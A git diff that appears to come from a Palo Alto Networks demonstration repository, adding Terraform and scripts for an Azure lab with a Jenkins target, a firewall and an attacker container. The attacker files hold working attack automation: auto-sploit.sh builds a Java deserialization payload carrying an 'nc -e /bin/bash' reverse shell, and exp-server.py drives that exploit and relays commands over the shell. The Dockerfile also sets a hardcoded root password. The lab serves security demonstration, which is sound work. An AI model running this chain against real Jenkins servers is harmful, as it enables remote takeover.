>> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"443:443\"" >> docker-compose.yml +echo " - \"5000:5000\"" >> docker-compose.yml +docker-compose up -d \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh new file mode 100644 index 00000000..4cabd5ed --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker1.sh @@ -0,0 +1,13 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/docker-compose.yml +wget https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/attacker/run.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/auto-sploit.sh +wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/attacker/exp-server.py +docker-compose build +docker-compose up -d diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh new file mode 100644 index 00000000..bb37c3e5 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver.sh @@ -0,0 +1,17 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " jenkins:" >> docker-compose.yml +echo " image: pglynn/jenkins:latest" >> docker-compose.yml +echo " environment:" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djava.awt.headless=true\"" >> docker-compose.yml +echo " JAVA_OPTS: \"-Djenkins.install.runSetupWizard=false\"" >> docker-compose.yml +echo " ports:" >> docker-compose.yml +echo " - \"50000:50000\"" >> docker-compose.yml +echo " - \"8080:8080\"" >> docker-compose.yml +docker-compose up -d diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh new file mode 100644 index 00000000..17b352c5 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_webserver1.sh @@ -0,0 +1,11 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/Dockerfile +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/docker-compose.yml +wget https://raw.githubusercontent.com/wwce/terraform/master/aws/Jenkins_proj-master/jenkins/jenkins.sh +docker-compose build +docker-compose up -d diff --git a/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars b/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars new file mode 100644 index 00000000..f56aa41c --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/terraform.tfvars @@ -0,0 +1,47 @@ +Attack_RG_Name = "" + +Azure_Region = "" + +Admin_Username = "" + +Admin_Password = "" + +Bootstrap_Storage_Account = "" + +Storage_Account_Access_Key = "" + +Storage_Account_Fileshare = "" + +Storage_Account_Fileshare_Directory = "None" + +Web_Initscript_Path = "/scripts/initialize_webserver.sh" + +Attack_Initscript_Path = "/scripts/initialize_attacker.sh" + +Victim_CIDR = "10.0.0.0/16" + +Attack_CIDR = "10.1.0.0/16" + +Mgmt_Subnet_CIDR = "10.0.0.0/24" + +Untrust_Subnet_CIDR = "10.0.1.0/24" + +Trust_Subnet_CIDR = "10.0.2.0/24" + +AppGW_Subnet_CIDR = "10.0.3.0/24" + +Web_Subnet_CIDR = "10.0.4.0/24" + +Attack_Subnet_CIDR = "10.1.1.0/24" + +FW_Mgmt_IP = "10.0.0.10" + +FW_Untrust_IP = "10.0.1.10" + +FW_Trust_IP = "10.0.2.10" + +WebLB_IP = "10.0.4.10" + +Web_IP = "10.0.4.50" + +Attack_IP = "10.1.1.50" diff --git a/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf new file mode 100644 index 00000000..12c64ba4 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/vnet-subnets.tf @@ -0,0 +1,53 @@ +# Configure the Microsoft Azure Provider +provider "azurerm" {} + +data "azurerm_resource_group" "resourcegroup" { + name = "${var.RG_Name}" +} + +# ********** VNET ********** + +# Create a virtual network in the resource group +resource "azurerm_virtual_network" "vnet" { + name = "vnet-fw" + address_space = ["${var.Victim_CIDR}"] + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" +} + +#### CREATE THE SUBNETS #### + +resource "azurerm_subnet" "management" { + name = "management" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Mgmt_Subnet_CIDR}" +} + +resource "azurerm_subnet" "untrust" { + name = "untrust" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Untrust_Subnet_CIDR}" +} + +resource "azurerm_subnet" "trust" { + name = "trust" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Trust_Subnet_CIDR}" +} + +resource "azurerm_subnet" "loadbalancers" { + name = "loadbalancers" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.AppGW_Subnet_CIDR}" +} + +resource "azurerm_subnet" "webservers" { + name = "webservers" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + virtual_network_name = "${azurerm_virtual_network.vnet.name}" + address_prefix = "${var.Web_Subnet_CIDR}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/webservers.tf b/azure/Jenkins_proj-working/WebInDeploy/webservers.tf new file mode 100644 index 00000000..5cfab277 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/webservers.tf @@ -0,0 +1,46 @@ +data "template_file" "cloudconfig" { + + template = "${file("${path.root}${var.Web_Initscript_Path}")}" +} +data "template_cloudinit_config" "config" { + gzip = true + base64_encode = true + + part { + content = "${data.template_file.cloudconfig.rendered}" + } +} + +resource "azurerm_virtual_machine" "webserver" { + name = "webserver" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + vm_size = "Standard_A3" + + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "web-disk" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + os_profile { + computer_name = "webserver" + admin_username = "${var.Admin_Username}" + admin_password = "${var.Admin_Password}" + custom_data = "${data.template_cloudinit_config.config.rendered}" + } + + network_interface_ids = ["${azurerm_network_interface.web1.id}"] + + os_profile_linux_config { + disable_password_authentication = false + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf b/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf new file mode 100644 index 00000000..844625d6 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInFWConf/azure_vars.tf @@ -0,0 +1,10 @@ + +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "Web_IP" {} +variable "LB_IP" {} +variable "Admin_Username" {} +variable "Admin_Password" {} +variable "FW_Default_GW" {} +variable "FW_Internal_GW" {} +variable "Web_Subnet_CIDR" {} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf b/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf new file mode 100644 index 00000000..da110808 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInFWConf/firewallconfig.tf @@ -0,0 +1,209 @@ +provider "panos" { + hostname = "${var.FW_Mgmt_IP}" + username = "${var.Admin_Username}" + password = "${var.Admin_Password}" +} + +resource "panos_management_profile" "imp_allow_ping" { + name = "Allow ping" + ping = true +} + +resource "panos_ethernet_interface" "eth1_1" { + name = "ethernet1/1" + vsys = "vsys1" + mode = "layer3" + comment = "External interface" + enable_dhcp = true + + management_profile = "${panos_management_profile.imp_allow_ping.name}" +} + +resource "panos_ethernet_interface" "eth1_2" { + name = "ethernet1/2" + vsys = "vsys1" + mode = "layer3" + comment = "Web interface" + enable_dhcp = true +} + +resource "panos_zone" "zone_untrust" { + name = "UNTRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_1.name}"] +} + +resource "panos_zone" "zone_trust" { + name = "TRUST" + mode = "layer3" + interfaces = ["${panos_ethernet_interface.eth1_2.name}"] +} + +resource "panos_service_object" "so_22" { + name = "service-tcp-22" + protocol = "tcp" + destination_port = "22" +} + +resource "panos_service_object" "so_221" { + name = "service-tcp-221" + protocol = "tcp" + destination_port = "221" +} + +resource "panos_service_object" "so_222" { + name = "service-tcp-222" + protocol = "tcp" + destination_port = "222" +} + +resource "panos_service_object" "so_81" { + name = "service-http-81" + protocol = "tcp" + destination_port = "81" +} + +resource "panos_address_object" "intLB" { + name = "Azure-Int-LB" + value = "${var.LB_IP}" + description = "Azure Int LB Address" +} + +resource "panos_security_policies" "security_policies" { + rule { + name = "SSH inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "SSH 221-222 inbound" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["ssh", "ping"] + services = ["${panos_service_object.so_221.name}", "${panos_service_object.so_222.name}"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Allow all ping" + source_zones = ["any"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["any"] + destination_addresses = ["any"] + applications = ["ping"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Permit Health Checks" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}"] + destination_addresses = ["any"] + applications = ["elb-healthchecker"] + services = ["application-default"] + categories = ["any"] + action = "allow" + } + + rule { + name = "Web browsing" + source_zones = ["${panos_zone.zone_untrust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_trust.name}", "${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["web-browsing", "jenkins", "windows-azure-base"] + services = ["service-http", "${panos_service_object.so_81.name}"] + categories = ["any"] + group = "Inbound" + action = "allow" + } + + rule { + name = "Allow all outbound" + source_zones = ["${panos_zone.zone_trust.name}"] + source_addresses = ["any"] + source_users = ["any"] + hip_profiles = ["any"] + destination_zones = ["${panos_zone.zone_untrust.name}"] + destination_addresses = ["any"] + applications = ["any"] + services = ["application-default"] + categories = ["any"] + group = "Outbound" + action = "allow" + } +} + +resource "panos_nat_policy" "nat1" { + name = "Web1 SSH" + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + service = "${panos_service_object.so_221.name}" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + sat_type = "dynamic-ip-and-port" + sat_address_type = "interface-address" + sat_interface = "${panos_ethernet_interface.eth1_2.name}" + dat_type = "static" + dat_address = "${var.Web_IP}" + dat_port = "22" +} + +resource "panos_nat_policy" "nat3" { + name = "Webserver NAT" + source_zones = ["${panos_zone.zone_untrust.name}"] + destination_zone = "${panos_zone.zone_untrust.name}" + service = "service-http" + source_addresses = ["any"] + destination_addresses = ["${var.FW_Untrust_IP}"] + sat_type = "dynamic-ip-and-port" + sat_address_type = "interface-address" + sat_interface = "${panos_ethernet_interface.eth1_2.name}" + dat_type = "dynamic" + dat_address = "Azure-Int-LB" + dat_port = "8080" +} + +resource "panos_virtual_router" "vr1" { + name = "default" + interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"] +} + +resource "panos_static_route_ipv4" "default" { + name = "default" + virtual_router = "${panos_virtual_router.vr1.name}" + interface = "${panos_ethernet_interface.eth1_1.name}" + destination = "0.0.0.0/0" + next_hop = "${var.FW_Default_GW}" +} + +resource "panos_static_route_ipv4" "internal" { + name = "internal" + virtual_router = "${panos_virtual_router.vr1.name}" + interface = "${panos_ethernet_interface.eth1_2.name}" + destination = "${var.Web_Subnet_CIDR}" + next_hop = "${var.FW_Internal_GW}" +} diff --git a/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars b/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars new file mode 100644 index 00000000..e35d4a52 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInFWConf/terraform.tfvars @@ -0,0 +1,15 @@ +Admin_Username = "" + +Admin_Password = "" + +FW_Untrust_IP = "10.0.1.10" + +LB_IP = "10.0.4.10" + +Web_IP = "10.0.4.50" + +FW_Default_GW = "10.0.1.1" + +Web_Subnet_CIDR = "10.0.4.0/24" + +FW_Internal_GW = "10.0.2.1" \ No newline at end of file diff --git a/azure/Jenkins_proj-working/attacker/Dockerfile b/azure/Jenkins_proj-working/attacker/Dockerfile new file mode 100644 index 00000000..e6123ab4 --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/Dockerfile @@ -0,0 +1,42 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo python3 python3-pip && rm -rf /var/lib/apt/lists/* + +RUN echo 'root:paloalto' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +RUN set -ex \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar -O ~/commons-beanutils-1.8.3.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar -O ~/commons-collections-3.2.1.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar -O ~/commons-lang-2.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar -O ~/commons-logging-1.2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar -O ~/ezmorph-1.0.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar -O ~/json-lib-2.4-jenkins-2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/payload.jar -O ~/payload.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/exploit.py -O ~/exploit.py -q --progress=bar:force:noscroll --show-progress + +EXPOSE 443 5000 + +RUN pip3 install requests flask pexpect + +COPY run.sh /usr/local/bin/run.sh +COPY exp-server.py /root/exp-server.py + +RUN chmod +x /usr/local/bin/run.sh + +COPY auto-sploit.sh /root/auto-sploit.sh + +RUN chmod +x /root/auto-sploit.sh + +USER root + +ENTRYPOINT ["/bin/tini", "--"] +ENV FLASK_APP=/root/exp-server.py + +# CMD ["/usr/local/bin/run.sh"] +CMD ["/usr/local/bin/flask", "run", "--host=0.0.0.0"] diff --git a/azure/Jenkins_proj-working/attacker/auto-sploit.sh b/azure/Jenkins_proj-working/attacker/auto-sploit.sh new file mode 100644 index 00000000..97c6dc3d --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/auto-sploit.sh @@ -0,0 +1,31 @@ +#! /bin/bash + +echo +echo "*******************************************************************" +echo +echo "Open another terminal window and run a netcat listener: nc -lvp 443" +echo +echo "Run the following command to spawn a shell once the reverse connection establishes:" +echo +echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" +echo +read -n 1 -s -r -p "Once the above is complete - press any key to continue" + +echo +echo "Enter Attacker IP Address:" +echo + +read attacker + +echo "Creating Payload with IP address" $attacker +echo + +java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" + +echo "Payload successfully created and saved as 'payload.ser'" +echo + +echo "Executing exploit..." +echo + +python3 exploit.py diff --git a/azure/Jenkins_proj-working/attacker/docker-compose.yml b/azure/Jenkins_proj-working/attacker/docker-compose.yml new file mode 100644 index 00000000..02cdb71b --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + attacker: + build: . + container_name: attacker + ports: + - "443:443" + - "5000:5000" diff --git a/azure/Jenkins_proj-working/attacker/exp-server.py b/azure/Jenkins_proj-working/attacker/exp-server.py new file mode 100644 index 00000000..19a4a77b --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/exp-server.py @@ -0,0 +1,175 @@ +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +""" +Palo Alto Networks - demo-launcher +Super simple App to expose a RESTful API to launch a couple of scripts +This software is provided without support, warranty, or guarantee. +Use at your own risk. +""" + +import pexpect +from flask import Flask +from flask import request +import os +import time + +app = Flask(__name__) + + +@app.route("/") +def hello(): + return "Good Day!" + + +@app.route("/launch", methods=['POST']) +def launch_sploit(): + """ + Accepts a JSON payload with the following structure: + { + "target": "nlb-something.fqdn.com", + "attacker": "1.2.3.4" + } + If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn + then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect + :return: Simple String response for now + """ + if request.is_json: + print(request.data) + payload = request.get_json() + print(request.mimetype) + print(request.content_type) + print(request.accept_mimetypes) + print(payload) + print(type(payload)) + target_ip = payload.get('target', '') + attacker_ip = payload.get('attacker', '') + if target_ip == "" or attacker_ip == "": + print('Payload is all wrong!') + print(request.payload) + return 'ERROR' + + exe = '/root/auto-sploit.sh' + if not os.path.exists(exe): + return 500, 'launch script does not exist' + + print('Launching auto-sploit.sh') + child = pexpect.spawn('/root/auto-sploit.sh') + child.delaybeforesend = 2 + found_index = child.expect(['press any key to continue', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('launching listener process') + _launch_listener() + child.send('\n') + else: + return 'ERROR - Could not press key to continue' + + found_index = child.expect(['Enter Attacker IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('Sending attacker ip :::' + attacker_ip + ':::') + child.sendline(attacker_ip) + else: + return 'ERROR - Could not enter attacker IP' + + found_index = child.expect(['Enter Jenkins Target IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print(child.before) + print('Sending target ip') + child.sendline(target_ip) + else: + print(child.before) + return 'ERROR - Could not enter jenkins IP' + + found_index = child.expect(['pwn', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('PWN') + print(child) + time.sleep(2) + return 'SUCCESS - auto-sploit launched!' + + else: + return 'No Bueno - No JSON payload detected' + + +@app.route("/send", methods=['POST']) +def send_cmd(): + if request.is_json: + data = request.get_json() + cli = data.get('cli', '') + if cli == '': + return 'No Bueno - Invalid JSON payload' + + if 'listener' in app.config: + print('We have a listener already up!') + listener = app.config.get('listener', '') + if not hasattr(listener, 'isalive') or not listener.isalive(): + return 'No Bueno - Listener does not appear to be active' + + print('Sending initial command to see where we are!') + listener.sendline('echo $SHLVL\n') + found_index = listener.expect(['1', 'jenkins@', 'root@', pexpect.EOF, pexpect.TIMEOUT]) + print(found_index) + if found_index == 0: + # no prompt yet + print('Great, trying to get a prompt now') + listener.sendline("python -c 'import pty; pty.spawn(\"/bin/bash\")'") + + if found_index > 2: + print(listener.before) + return 'Someting is wrong with the listener connection!' + + # listener.sendline(cli) + # print(listener) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + listener.sendline(cli) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index after cli is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + print(listener) + return listener.before + + else: + return 'NOPE' + else: + return 'NOWAYJOSE' + + +def _launch_listener(): + if 'listener' not in app.config: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + print('Launched and ready to rock') + return True + else: + listener = app.config['listener'] + if hasattr(listener, 'isalive') and listener.isalive(): + return True + else: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + return True + + diff --git a/azure/Jenkins_proj-working/attacker/run.sh b/azure/Jenkins_proj-working/attacker/run.sh new file mode 100644 index 00000000..bc9b9de7 --- /dev/null +++ b/azure/Jenkins_proj-working/attacker/run.sh @@ -0,0 +1,11 @@ +#! /bin/bash -e + +# Running nc on an unexposed port to keep the container up + +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + exec nc -l -p 56789 "$@" + +fi + +exec "$@" diff --git a/azure/Jenkins_proj-working/azure_login.py b/azure/Jenkins_proj-working/azure_login.py new file mode 100644 index 00000000..bbe85a41 --- /dev/null +++ b/azure/Jenkins_proj-working/azure_login.py @@ -0,0 +1,10 @@ +from azure import cli +from azure.cli.core import get_default_cli +import sys + +sys.sterr = sys.stdout + +print('Logging in to Azure using device code') + +get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) +pass \ No newline at end of file diff --git a/azure/Jenkins_proj-working/deploy-v2.html b/azure/Jenkins_proj-working/deploy-v2.html new file mode 100644 index 00000000..123a542a --- /dev/null +++ b/azure/Jenkins_proj-working/deploy-v2.html @@ -0,0 +1,185 @@ + +Python: module deploy-v2 + + + + + +
 
+ 
deploy-v2
index
/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py
+

# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

+# Author: Justin Harris jharris@paloaltonetworks.com

+Usage

+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>

+

+ + + + + +
 
+Modules
       
xml.etree.ElementTree
+argparse
+pandevice.firewall
+json
+
logging
+os
+requests
+subprocess
+
sys
+time
+urllib3
+uuid
+
xmltodict
+

+ + + + + +
 
+Classes
       
+
builtins.Exception(builtins.BaseException) +
+
+
DeployRequestException +
+
+
+

+ + + + + + + +
 
+class DeployRequestException(builtins.Exception)
   Common base class for all non-exit exceptions.
 
 
Method resolution order:
+
DeployRequestException
+
builtins.Exception
+
builtins.BaseException
+
builtins.object
+
+
+Data descriptors defined here:
+
__weakref__
+
list of weak references to the object (if defined)
+
+
+Methods inherited from builtins.Exception:
+
__init__(self, /, *args, **kwargs)
Initialize self.  See help(type(self)) for accurate signature.
+ +
__new__(*args, **kwargs) from builtins.type
Create and return a new object.  See help(type) for accurate signature.
+ +
+Methods inherited from builtins.BaseException:
+
__delattr__(self, name, /)
Implement delattr(self, name).
+ +
__getattribute__(self, name, /)
Return getattr(self, name).
+ +
__reduce__(...)
helper for pickle
+ +
__repr__(self, /)
Return repr(self).
+ +
__setattr__(self, name, value, /)
Implement setattr(self, name, value).
+ +
__setstate__(...)
+ +
__str__(self, /)
Return str(self).
+ +
with_traceback(...)
Exception.with_traceback(tb) --
+set self.__traceback__ to tb and return self.
+ +
+Data descriptors inherited from builtins.BaseException:
+
__cause__
+
exception cause
+
+
__context__
+
exception context
+
+
__dict__
+
+
__suppress_context__
+
+
__traceback__
+
+
args
+
+

+ + + + + +
 
+Functions
       
apply_tf(working_dir, vars, description)
Handles terraform operations and returns variables in outputs.tf as a dict.
+:param working_dir: Directory that contains the tf files
+:param vars: Additional variables passed in to override defaults equivalent to -var
+:param description: Description of the deployment for logging purposes
+:return:    return_code - 0 for success or other for failure
+            outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
create_azure_fileshare(share_prefix, account_name, account_key)
Generate a unique share name to avoid overlaps in shared infra
+:param share_prefix:
+:param account_name:
+:param account_key:
+:return:
+
getApiKey(hostname, username, password)
Generates a Paloaltonetworks api key from username and password credentials
+:param hostname: Ip address of firewall
+:param username:
+:param password:
+:return: api_key API key for firewall
+
getFirewallStatus(fwIP, api_key)
+
getServerStatus(IP)
Gets the server status by sending an HTTP request and checking for a 200 response code
+
main(username, password, rg_name, azure_region)
Main function
+:param username:
+:param password:
+:param rg_name: Resource group name prefix
+:param azure_region: Region
+:return:
+
send_request(call)
Handles sending requests to API
+:param call: url
+:return: Retruns result of call. Will return response for codes between 200 and 400.
+         If 200 response code is required check value in response
+
update_fw(fwMgtIP, api_key)
Applies latest AppID, Threat and AV updates to firewall after launch
+:param fwMgtIP: Firewall management IP
+:param api_key: API key
+
update_status(key, value)
For tracking purposes.  Write responses to file.
+:param key:
+:param value:
+:return:
+
walkdict(d, key)
Finds a key in a dict or nested dict and returns the value associated with it
+:param d: dict or nested dict
+:param key: key value
+:return: value associated with key
+
write_status_file(message_dict)
Writes the deployment state to a dict and outputs to file for status tracking
+

+ + + + + +
 
+Data
       formatter = <logging.Formatter object>
+handler = <StreamHandler <stderr> (NOTSET)>
+logger = <RootLogger root (INFO)>
+status_output = {}
+ \ No newline at end of file diff --git a/azure/Jenkins_proj-working/deploy.py b/azure/Jenkins_proj-working/deploy.py new file mode 100644 index 00000000..ee691764 --- /dev/null +++ b/azure/Jenkins_proj-working/deploy.py @@ -0,0 +1,730 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage + +python deploy.py --username -p -r -j + +""" + +import argparse +import json +import logging +import os +import subprocess +import sys +import time +import uuid +import xml.etree.ElementTree as ET +import xmltodict +import requests +import urllib3 + +from azure.common import AzureException +from azure.storage.file import FileService + + +from pandevice import firewall +from python_terraform import Terraform +from collections import OrderedDict 